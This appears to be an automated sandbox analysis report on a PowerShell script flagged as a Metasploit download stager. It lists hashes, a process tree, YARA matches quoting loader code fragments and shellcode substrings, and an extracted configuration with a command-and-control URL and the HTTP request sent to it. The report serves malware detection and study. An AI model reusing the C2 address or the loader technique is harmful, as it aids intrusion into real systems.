Loading ...

Play interactive tourEdit tour

Windows Analysis Report a.ps1

Overview

General Information

Sample Name:a.ps1
Analysis ID:444594
MD5:e79502a7f159ee2c72aa997e922559e3
SHA1:12601ad19988ac4c58a245d151855439dc1a0382
SHA256:90a17ac3595ed77f5f6cd307b3ffd2cf4c564aa05d132fdb37e7460d4081be70
Infos:

Most interesting Screenshot:

Detection

Metasploit
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Metasploit Payload
Yara detected MetasploitPayload
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7144 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\a.ps1' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5964 cmdline: 'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfile MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WerFault.exe (PID: 6244 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • WerFault.exe (PID: 900 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Metasploit

{"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MATP; MATP)\r\n", "Type": "Metasploit Download", "URL": "http://206.189.69.35/x1Fm"}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
a.ps1SUSP_PS1_FromBase64String_Content_IndicatorDetects suspicious base64 encoded PowerShell expressionsFlorian Roth
  • 0x28:$: ::FromBase64String("H4s
  • 0x28:$: ::FromBase64String("H4sIA

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txtMsfpayloads_msf_refMetasploit Payloads - file msf-ref.ps1Florian Roth
  • 0x3b2:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
  • 0x8ca:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
  • 0x994:$s5: = [System.Convert]::FromBase64String(
  • 0x626:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
  • 0x814:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txtBase64_PS1_ShellcodeDetects Base64 encoded PS1 ShellcodeNick Carr, David Ledbetter
  • 0x9be:$substring: AAAAYInlM
  • 0x9ba:$pattern2: /OiJAAAAYInlM
C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txtJoeSecurity_MetasploitPayload_1Yara detected MetasploitPayloadJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmpMsfpayloads_msf_refMetasploit Payloads - file msf-ref.ps1Florian Roth
    • 0x34bc:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
    • 0x39d4:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
    • 0x3a9e:$s5: = [System.Convert]::FromBase64String(
    • 0x3730:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
    • 0x391e:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
    00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmpBase64_PS1_ShellcodeDetects Base64 encoded PS1 ShellcodeNick Carr, David Ledbetter
    • 0x3ac8:$substring: AAAAYInlM
    • 0x3ac4:$pattern2: /OiJAAAAYInlM
    00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmpJoeSecurity_MetasploitPayload_1Yara detected MetasploitPayloadJoe Security
      00000005.00000000.700532257.0000000004DFB000.00000004.00000001.sdmpJoeSecurity_MetasploitPayload_1Yara detected MetasploitPayloadJoe Security
        00000000.00000002.758206256.000001CDA068C000.00000004.00000001.sdmpJoeSecurity_MetasploitPayload_1Yara detected MetasploitPayloadJoe Security
          Click to see the 29 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfile, CommandLine: 'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfile, CommandLine|base64offset|contains: W*', Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\a.ps1', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7144, ProcessCommandLine: 'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfile, ProcessId: 5964

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: a.ps1Avira: detected
          Found malware configurationShow sources
          Source: 00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmpMalware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MATP; MATP)\r\n", "Type": "Metasploit Download", "URL": "http://206.189.69.35/x1Fm"}
          Multi AV Scanner detection for submitted fileShow sources
          Source: a.ps1Virustotal: Detection: 50%Perma Link
          Source: a.ps1ReversingLabs: Detection: 55%
          Source: Binary string: System.Configuration.Install.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: anagement.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: System.Data.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: umerics.pdb" source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: System.Numerics.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbTR source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: clr.pdb source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: CLBCatQ.pdb! source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: .textn.pdb ` source: powershell.exe, 00000005.00000000.702935630.00000000077BB000.00000004.00000001.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: gpapi.pdbG source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.DirectoryServices.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: anagement.pdb&& source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: onfiguration.Install.pdbLL source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: atl.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: MpOAV.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb\ source: WerFault.exe, 0000000D.00000003.738499813.00000000052BD000.00000004.00000001.sdmp
          Source: Binary string: onfiguration.Install.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.DirectoryServices.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: nsi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb@ source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb""F` source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.pdb4 source: WER4735.tmp.dmp.13.dr
          Source: Binary string: clrjit.pdb9 source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.Install.pdbH source: WER4735.tmp.dmp.13.dr
          Source: Binary string: gpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS source: WER4735.tmp.dmp.13.dr
          Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: ore.pdb{{ source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.Transactions.pdb% source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: System.Configuration.Install.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: System.Management.Automation.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.pdb source: WER4735.tmp.dmp.13.dr
          Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbf source: WER4735.tmp.dmp.13.dr
          Source: Binary string: System.Management.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER4735.tmp.dmp.13.dr
          Source: Binary string: dpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: secur32.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: powershell.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: winhttp.pdbo source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: version.pdb/ source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.ni.pdbRSDS source: WER4735.tmp.dmp.13.dr
          Source: Binary string: System.Numerics.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: t.PowerShell.ConsoleHost.pdb" source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
          Source: Binary string: wininet.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.Management.Automation.pdb" source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
          Source: Binary string: System.Core.ni.pdbRSDSD source: WER4735.tmp.dmp.13.dr
          Source: Binary string: MpOAV.pdbs source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.Management.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: nsi.pdb_ source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: shlwapi.pdb5 source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb- source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.PowerShell.Security.pdbD source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: dpapi.pdbQ source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: MpClient.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: wininet.pdb_ source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: userenv.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: irectoryServices.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: System.Data.pdbu source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: System.Transactions.pdb\ source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: OnDemandConnRouteHelper.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: t.PowerShell.ConsoleHost.pdb source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.PowerShell.Security.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: System.ni.pdbRSDS source: WER4735.tmp.dmp.13.dr
          Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS)m source: WER4735.tmp.dmp.13.dr
          Source: Binary string: ll.Commands.Utility.pdb^ source: powershell.exe, 00000005.00000000.706645322.0000000008789000.00000004.00000001.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: mscoree.pdb3 source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: ransactions.pdbnn source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: version.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: System.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: System.Management.Automation.pdb@ source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: ore.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: psapi.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb2 source: powershell.exe, 00000005.00000000.702935630.00000000077BB000.00000004.00000001.sdmp
          Source: Binary string: System.ni.pdbT3yk source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: Amsi.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: umerics.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: ransactions.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: System.Transactions.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp
          Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: Microsoft.PowerShell.Security.pdbp source: WER4735.tmp.dmp.13.dr
          Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: http://206.189.69.35/x1Fm
          Source: Joe Sandbox ViewIP Address: 206.189.69.35 206.189.69.35
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: global trafficHTTP traffic detected: GET /x1Fm HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MATP; MATP)Host: 206.189.69.35Connection: Keep-AliveCache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 206.189.69.35
          Source: unknownTCP traffic detected without corresponding DNS query: 206.189.69.35
          Source: unknownTCP traffic detected without corresponding DNS query: 206.189.69.35
          Source: unknownTCP traffic detected without corresponding DNS query: 206.189.69.35
          Source: unknownTCP traffic detected without corresponding DNS query: 206.189.69.35
          Source: unknownTCP traffic detected without corresponding DNS query: 206.189.69.35
